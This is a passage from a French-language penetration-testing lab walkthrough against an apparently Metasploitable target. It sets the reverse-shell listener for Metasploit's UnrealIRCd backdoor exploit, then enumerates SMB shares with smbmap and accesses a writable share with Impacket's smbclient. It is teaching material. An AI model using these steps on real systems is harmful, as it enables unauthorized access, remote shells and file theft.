           TX packets 250743 bytes 35448926 (33.8 MiB)
           TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
37
38 msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LHOST
      192.168.56.114
39 LHOST => 192.168.56.114
```

#### On enfin executer l'exploit, et obtenir notre reverse shell :

#### **SMB**

On peut lister les partages diponnbles avec smbmap:

```
1 $smbmap -H 192.168.56.115
2
3 [+] IP: 192.168.56.115:445 Name: 192.168.56.115
          Disk
4
              Permissions Comment
                                                           NO ACCESS
6
      print$
          Printer Drivers
7
                                                           READ, WRITE oh
      tmp
          noes!
8
      opt
                                                           NO ACCESS
      IPC$
                                                           NO ACCESS
                                                                       IPC
           Service (metasploitable server (Samba 3.0.20-Debian))
                                                                        IPC
                                                           NO ACCESS
      ADMIN$
           Service (metasploitable server (Samba 3.0.20-Debian))
```

On constate que l'on a un accès READ / WRITE au partage tmp.

On peut s'y connecter avec l'outil **smbclient** de Impacket.

```
1 $locate smbclient.py
2
3 /usr/lib/python3/dist-packages/impacket/examples/smbclient.py
4 /usr/share/doc/python3-impacket/examples/smbclient.py
```

On peut l'exécuter en donnant l'IP de la machine cible en paramètre.

```
4 Type help for list of commands
5 #
```

La commande **shares** permet de lister les partages disponibles. On utilise la commande **use nom\_du\_share** pour selectionner un partage :

```
1 Type help for list of commands
2 # shares
3 print$
4 tmp
5 opt
6 IPC$
7 ADMIN$
8
9 # use tmp
```

On peut ensuite utiliser les commande **ls**, **cd** et **get** pour afficher les fichiers, se déplacer, et récupérer des fichiers.